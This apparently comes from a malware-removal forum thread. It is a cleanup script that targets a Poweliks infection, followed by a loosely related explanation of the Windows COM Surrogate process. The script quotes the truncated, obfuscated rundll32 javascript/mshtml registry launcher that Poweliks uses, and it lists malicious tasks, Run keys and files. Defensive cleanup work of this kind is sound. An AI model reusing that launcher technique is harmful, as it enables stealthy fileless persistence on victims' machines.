Start
CustomCLSID: HKU\S-1-5-21-3982674863-3394640220-3061210404-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {8A33A367-144B-4AA8-9E53-949F43B8E733} - System32\Tasks\{ADE3AE3C-4120-FFD1-F498-F0AD5FD7842D} => C:\Users\Scott\AppData\Roaming\bnlct.dll [2014-10-28] () <==== ATTENTION
Task: {B32F1978-2D02-4247-B25B-85DE5B4587FB} - System32\Tasks\DSite => C:\Users\Scott\AppData\Roaming\DSite\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
HKU\S-1-5-21-3982674863-3394640220-3061210404-1001\...\Run: [BOOTdtsh] => C:\Users\Scott\AppData\Local\Temp\cmdir_35.exe [286750 2014-11-02] (bhyvgtcfrd) <===== ATTENTION
C:\Users\Scott\AppData\Local\Temp\cmdir_35.exe
HKU\S-1-5-21-3982674863-3394640220-3061210404-1001\...\Policies\Explorer: [NoDriveTypeAutoRun] 0x00000000
HKU\S-1-5-21-3982674863-3394640220-3061210404-1001\...\MountPoints2: {9655c5ce-c3d6-11e3-b3d7-d4bed9d13827} - G:\VZW_Software_upgrade_assistant_installer.exe
HKU\S-1-5-21-3982674863-3394640220-3061210404-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (Microsoft)
C:\ProgramData\Windows Genuine Advantage
C:\Users\Scott\AppData\Roaming\bnlct.dll
C:\Windows\System32\Tasks\{ADE3AE3C-4120-FFD1-F498-F0AD5FD7842D}
C:\Users\Scott\AppData\Roaming\krskxsy.dll15
C:\Users\Scott\AppData\Local\Temp\cmdir_35.exe
EmptyTemp:
End
Pardon?Yes.
The COM Surrogate is a fancy name for sacrificial process for a COM object that is run outside of the process that requested it. Explorer uses the COM Surrogate when extracting thumbnails, for example. If you go to a folder with thumbnails enabled, Explorer will fire off a COM Surrogate and use it to compute the thumbnails for the documents in the folder. It does this because Explorer has learned not to trust thumbnail extractors; they have a poor track record for stability.
Explorer has decided to absorb the performance penalty in exchange for the improved reliability resulting in moving these dodgy bits of code out of the main Explorer process. When the thumbnail extractor crashes, the crash destroys the COM Surrogate process instead of Explorer.